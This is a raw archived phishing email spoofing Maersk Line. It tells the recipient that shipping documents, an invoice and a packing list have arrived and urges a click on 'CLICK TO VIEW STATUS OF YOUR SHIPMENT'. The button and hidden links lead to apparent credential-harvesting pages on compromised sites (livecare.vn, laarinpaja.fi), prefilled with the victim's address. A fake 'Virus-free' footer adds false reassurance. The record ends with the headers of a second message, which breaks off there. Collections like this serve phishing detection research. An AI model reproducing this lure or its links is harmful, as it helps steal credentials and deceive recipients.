From: Maersk Line <boby@bodywholesale.com>
To: jose@monkey.org
Subject: ORIGINAL SHIPPING DOCUMENT INVOICE / PAYMENT jose@monkey.org
Date: 28 Apr 2019 18:15:25 -0700
Message-ID: <20190428181525.D3C3CD59B7899F73@bodywholesale.com>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - 1516b.k.time4vps.cloud
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - bodywholesale.com
X-Get-Message-Sender-Via: 1516b.k.time4vps.cloud: authenticated_id: boby@bodywholesale.com
X-Authenticated-Sender: 1516b.k.time4vps.cloud: boby@bodywholesale.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: O
X-Status: 
X-Keywords:                  
X-UID: 102

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.19236"></HEAD>
<body style=3D"MARGIN: 0.5em">
<DIV dir=3Dltr>
<DIV dir=3Dltr>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 12pt; FONT-FAMILY: Calibri=
, Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline;=
 WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRA=
NSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FON=
T-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-S=
PACING: normal; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR=
: rgb(255,255,255); TEXT-INDENT: 0px; font-stretch:=20
inherit"><SPAN>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: small; FONT-FAMILY: Arial,=
 Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; =
BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(34,34,34); PADDING-BOTTOM: 0px; TEXT-A=
LIGN: left; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT=
: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); font-stre=
tch: inherit">
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 15px; FONT-FAMILY: JHengHe=
i; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: =
0px; COLOR: rgb(31,73,125); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-=
LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROU=
ND-COLOR: rgb(255,255,255); font-stretch: inherit">
<DIV><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 14pt; FONT-FAMILY: C=
alibri, Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: bas=
eline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(81,167,249); PADDING-BOTTOM: 0p=
x; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: inline; PADDI=
NG-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); f=
ont-stretch: inherit">
<A class=3D"gmail-m_-5165360137590899368m_7682165948378413589gmail-irc_mil =
gmail-m_-5165360137590899368m_7682165948378413589gmail-i3597" style=3D"BORD=
ER-LEFT-WIDTH: 0px; FONT-SIZE: small; TEXT-DECORATION: underline; FONT-FAMI=
LY: arial, sans-serif; BORDER-RIGHT-WIDTH: 0px; WHITE-SPACE: normal; BORDER=
-BOTTOM-WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 4=
00; COLOR: rgb(102,0,153); FONT-STYLE: normal; TEXT-ALIGN: center; LETTER-S=
PACING: normal; BORDER-TOP-WIDTH: 0px;=20
BACKGROUND-COLOR: rgb(34,34,34); TEXT-INDENT: 0px" href=3D"https://laarinpa=
ja.fi/min/view/index.php?email=3D%0%" target=3D_blank></A><BR></SPAN>&nbsp;=
</DIV>
<DIV><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 14pt; FONT-FAMILY: C=
alibri, Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: bas=
eline; BORDER-BOTTOM-WIDTH: 0px; COLOR: rgb(81,167,249); PADDING-BOTTOM: 0p=
x; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; DISPLAY: inline; PADDI=
NG-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); f=
ont-stretch: inherit"><B>ORIGINAL SHIPPING DOCUMENT</B></SPAN><SPAN>&nbsp;<=
/SPAN><BR></DIV></DIV></DIV>
<P style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Calibri, sans-serif; COLOR: rgb(5=
1,51,51); TEXT-ALIGN: left; MARGIN: 0cm 0cm 0pt; BACKGROUND-COLOR: rgb(255,=
255,255)"><BR><BR></P></SPAN></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 12pt; FONT-FAMILY: Calibri=
, Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline;=
 WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRA=
NSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FON=
T-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-S=
PACING: normal; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR=
: rgb(255,255,255); TEXT-INDENT: 0px; font-stretch:=20
inherit">
<DIV>Please find copy of your shipping document BL / Invoice&nbsp; vessel's=
 ETA &amp; Packing List<SPAN>&nbsp;</SPAN><SPAN>&nbsp;</SPAN><SPAN>that jus=
t arrived our office</SPAN>.<BR></DIV>
<DIV><BR></DIV><SPAN>Kindly check document below and and click the link to =
confirm your parcel and conignee address. Your email<SPAN>jose@monkey.org</=
SPAN><SPAN> </SPAN>was listed as the contact details of consignee Parcel so=
 confirm you parcel now below</SPAN><SPAN>&nbsp;</SPAN><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 12pt; FONT-FAMILY: Calibri=
, Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline;=
 WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0px; WORD-SPACING: 0px; TEXT-TRA=
NSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; FON=
T-STYLE: normal; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; LETTER-S=
PACING: normal; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BACKGROUND-COLOR=
: rgb(255,255,255); TEXT-INDENT: 0px; font-stretch:=20
inherit"><BR></DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 16px; BORDER-RIGHT-WIDTH: =
0px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0p=
x; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(51=
,51,51); PADDING-BOTTOM: 0px; FONT-STYLE: normal; PADDING-TOP: 0px; PADDING=
-LEFT: 0px; MARGIN: 0px; LETTER-SPACING: normal; PADDING-RIGHT: 0px; BORDER=
-TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font=
-stretch: inherit">
<DIV>
<DIV>
<DIV class=3Dgmail_quote>
<DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 15px; FONT-FAMILY: JHengHe=
i; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; =
BORDER-BOTTOM-WIDTH: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(31,73,125); PADDING-BOTTOM: 0px; FONT-STYLE: normal; TEXT-ALIGN: left; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-=
TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); font-stretch: inherit">=

<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: small; FONT-FAMILY: Arial,=
 Helvetica, sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; =
WHITE-SPACE: normal; BORDER-BOTTOM-WIDTH: 0px; TEXT-TRANSFORM: none; FONT-W=
EIGHT: 400; COLOR: rgb(34,34,34); PADDING-BOTTOM: 0px; FONT-STYLE: normal; =
PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDE=
R-TOP-WIDTH: 0px; font-stretch: inherit">
<DIV>
<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 15px; FONT-FAMILY: JHengHe=
i; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; WHITE-SPACE: normal; =
BORDER-BOTTOM-WIDTH: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rg=
b(31,73,125); PADDING-BOTTOM: 0px; FONT-STYLE: normal; TEXT-ALIGN: left; PA=
DDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-=
TOP-WIDTH: 0px; BACKGROUND-COLOR: rgb(255,255,255); font-stretch: inherit">=

<DIV style=3D"BORDER-LEFT-WIDTH: 0px; FONT-SIZE: 13px; FONT-FAMILY: arial, =
sans-serif; BORDER-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTO=
M-WIDTH: 0px; COLOR: rgb(0,0,0); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PAD=
DING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px; BAC=
KGROUND-COLOR: rgb(255,255,255); font-stretch: inherit"><SPAN><SPAN><BR></S=
PAN></SPAN><SPAN>
<A title=3Dhttp://laarinpaja.fi/wedmorning/view/index.php?email=3Dgraceofgo=
ddn3@gmail.com style=3D"BORDER-LEFT-WIDTH: 1px; FONT-SIZE: 11px; FONT-FAMIL=
Y: inherit; BORDER-RIGHT-WIDTH: 1px; BORDER-TOP-COLOR: rgb(48,121,237); VER=
TICAL-ALIGN: baseline; BACKGROUND-IMAGE: none; BORDER-BOTTOM-WIDTH: 1px; BA=
CKGROUND-REPEAT: repeat; BACKGROUND-POSITION: 0% 0%; BORDER-LEFT-COLOR: rgb=
(48,121,237); COLOR: white; PADDING-BOTTOM: 0px; BORDER-BOTTOM-COLOR: rgb(4=
8,121,237); TEXT-ALIGN: center; PADDING-TOP: 0px;=20
PADDING-LEFT: 8px; MARGIN: 0px; MIN-HEIGHT: 27px; DISPLAY: inline-block; BO=
RDER-RIGHT-COLOR: rgb(48,121,237); LINE-HEIGHT: 27px; PADDING-RIGHT: 8px; B=
ORDER-TOP-WIDTH: 1px; BACKGROUND-COLOR: rgb(77,144,254); font-stretch: inhe=
rit" href=3D"http://livecare.vn/wp-content/plugins/cmsboost/sunday/view/ind=
ex.php?email=3Djose@monkey.org" target=3D_blank>CLICK TO VIEW STATUS OF YOU=
R SHIPMENT</A><BR>&nbsp;</SPAN></DIV></DIV></DIV>
<P style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Calibri, sans-serif; COLOR: rgb(5=
1,51,51); MARGIN: 0cm 0cm 0pt">&nbsp;</P>
<P style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Calibri, sans-serif; COLOR: rgb(5=
1,51,51); MARGIN: 0cm 0cm 0pt"><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; BORDE=
R-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COL=
OR: rgb(31,73,125); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0p=
x; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px">
<SPAN id=3Dgmail-m_-5165360137590899368m_7682165948378413589gmail-m_-129301=
1608184109136SmartSuggestionsKeyword968726 title=3D"Search for suggestions"=
 class=3Dgmail-m_-5165360137590899368m_7682165948378413589gmail-m_-12930116=
08184109136_3BovmbeaPZ9PfDCok9Szcj>Thanks</SPAN><SPAN>&nbsp;</SPAN>&amp; Re=
gards,</SPAN></P>
<P style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Calibri, sans-serif; COLOR: rgb(5=
1,51,51); MARGIN: 0cm 0cm 0pt"><SPAN style=3D"BORDER-LEFT-WIDTH: 0px; BORDE=
R-RIGHT-WIDTH: 0px; VERTICAL-ALIGN: baseline; BORDER-BOTTOM-WIDTH: 0px; COL=
OR: rgb(31,73,125); PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0p=
x; MARGIN: 0px; PADDING-RIGHT: 0px; BORDER-TOP-WIDTH: 0px">Logistics manage=
r</SPAN></P>
<P style=3D"FONT-SIZE: 11pt; FONT-FAMILY: Calibri, sans-serif; MARGIN: 0cm =
0cm 0pt"><FONT color=3D#1f497d>Maersk Line Shipping</FONT></P></DIV></DIV><=
/DIV></DIV></DIV></DIV></DIV>
<DIV id=3Dgmail-m_-5165360137590899368m_7682165948378413589gmail-m_-1293011=
608184109136DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2 style=3D"FONT-SIZE: small;=
 FONT-FAMILY: Arial, Helvetica, sans-serif; WHITE-SPACE: normal; WORD-SPACI=
NG: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT=
-STYLE: normal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255);=
 TEXT-INDENT: 0px"><BR>
<table style=3D"BORDER-TOP: rgb(211,212,222) 1px solid">
<TBODY>
<TR>
<td style=3D"FONT-FAMILY: Roboto, RobotoDraft, Helvetica, Arial, sans-serif=
; WIDTH: 55px; PADDING-TOP: 13px; MARGIN: 0px"><A style=3D"COLOR: rgb(17,85=
,204)" href=3D"https://deref-mail.com/mail/client/cr6z2d4mMr0/dereferrer/?r=
edirectUrl=3Dhttps%3A%2F%2Fwww.avast.com%2Fsig-email%3Futm_medium%3Demail%2=
6utm_source%3Dlink%26utm_campaign%3Dsig-email%26utm_content%3Demailclient%2=
6utm_term%3Dicon" target=3D_blank>
<img style=3D"HEIGHT: 29px; WIDTH: 46px" alt=3D"" src=3D"https://ci6.google=
usercontent.com/proxy/1n_lAGMCOdwrTFWUkDybQUQIYQkFAHeaE0J33VD4CleiK3voTiRq-=
v0PBqDSlgt9dAQWw3JZLxG8FIvxTBh-QOT-oiJ_zn1vBtG7vCpwT8UknTHi6hogZX9q6-h4Afqe=
MgyNqt1QVkfMxQdeeHK6lBqLx46i4dHgDWuQY_hXUoXDv_v8joKaVgxjhNtJTPot0yc8Wv2taoJ=
XCP90BTDFAMmJK4ahee2uY2MHReLRf-x9GMkztbH10I_hvQ2dl9D8J8cbh_luHnkwdcfgQEmia8=
ElvrrqfdMhvY73X8VjUQ=3Ds0-d-e1-ft#https://3c-lxa.mail.com/mail/client/attac=
hment/view/tmai1598bd5b9a1c2dd2/aWNvbi1lbnZlbG9wZS10aWNrLXJvdW5kLW9yYW5nZS1=
hbmltYXRlZC1uby1yZXBlYXQtdjEu
Z2lm;jsessionid=3D2AF40009D28AF881D87667436957F831-n2.lxa08a" width=3D"46" =
height=3D"29"></A></TD>
<td style=3D"FONT-SIZE: 13px; FONT-FAMILY: Arial, Helvetica, sans-serif; WI=
DTH: 470px; COLOR: rgb(65,66,78); PADDING-TOP: 12px; MARGIN: 0px; LINE-HEIG=
HT: 18px">Virus-free.<SPAN>&nbsp;</SPAN> <A style=3D"COLOR: rgb(68,83,234)"=
 href=3D"https://deref-mail.com/mail/client/cr6z2d4mMr0/dereferrer/?redirec=
tUrl=3Dhttps%3A%2F%2Fwww.avast.com%2Fsig-email%3Futm_medium%3Demail%26utm_s=
ource%3Dlink%26utm_campaign%3Dsig-email%26utm_content%3Demailclient%26utm_t=
erm%3Dlink" target=3D_blank>www.avast.com</A></TD></TR>
</TBODY></TABLE></DIV></DIV></DIV>
<P></P></BODY></HTML>

From jose@monkey.org Mon Apr 29 05:36:27 2019 +0000
Return-Path: ved@zdravushka.by
Delivered-To: jose@monkey.org
X-FDA: 75431641614.34.quill83_1b43de48fb53b
X-Spam-Summary: 80,0,0,5080ceb94df7c6c3,d41d8cd98f00b204,ved@zdravushka.by,:,RULES_HIT:41:72:355:375:379:495:800:962:967:969:973:983:988:989:1021:1189:1208:1224:1260:1261:1263:1311:1313:1314:1345:1381:1431:1436:1437:1513:1515:1516:1517:1521:1533:1534:1542:1588:1589:1593:1594:1711:1714:1730:1747:1777:1792:2393:2525:2527:2560:2563:2682:2685:2828:2859:2895:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3876:3877:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:5007:6114:6117:6119:6261:6642:6650:6703:7809:8518:8599:8603:8885:8957:8987:9025:9080:9388:9468:9908:10004:11473:11658:11914:12043:12114:12438:12517:12519:12555:12740:12764:12895:12955:12958:12967:12986:13025:13139:13439:13975:14093:14096:14181:14721:14849:18000:21080:21433:21451:21483:21524:21554:21627:21740:21810:21819:30070,0,RBL:86.57.219.10:@zdravushka.by:.lbl8.mailshell.net-62.2.53.180 64.100.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fp,MSBL:0,DNSBL:neu
X-HE-Tag: quill83_1b43de48fb53b
X-Filterd-Recvd-Size: 3658
Received: from mail.zdravushka.by (mail.zdravushka.by [86.57.219.10])
	by imf29.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 29 Apr 2019 05:36:27 +0000 (UTC)
Received: from mail.zdravushka.by (localhost.localdomain [127.0.0.1])
	by mail.zdravushka.by (Proxmox) with ESMTP id C212421DA7
	for <jose@monkey.org>; Mon, 29 Apr 2019 08:36:25 +0300 (+03)
Received: from post.zdravushka.by (post.zdravushka.local [192.168.1.254])
	by mail.zdravushka.by (Proxmox) with ESMTPS id A6D9B21BBB
	for <jose@monkey.org>; Mon, 29 Apr 2019 08:36:25 +0300 (+03)
Received: from zdravushka.by (unknown [37.49.224.83])
	(using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits))
	(No client certificate requested)
	(Authenticated sender: admin@zdravushka.by)
	by post.zdravushka.by (Postfix) with ESMTPSA id 72900A40D2F
	for <jose@monkey.org>; Mon, 29 Apr 2019 08:36:25 +0300 (+03)
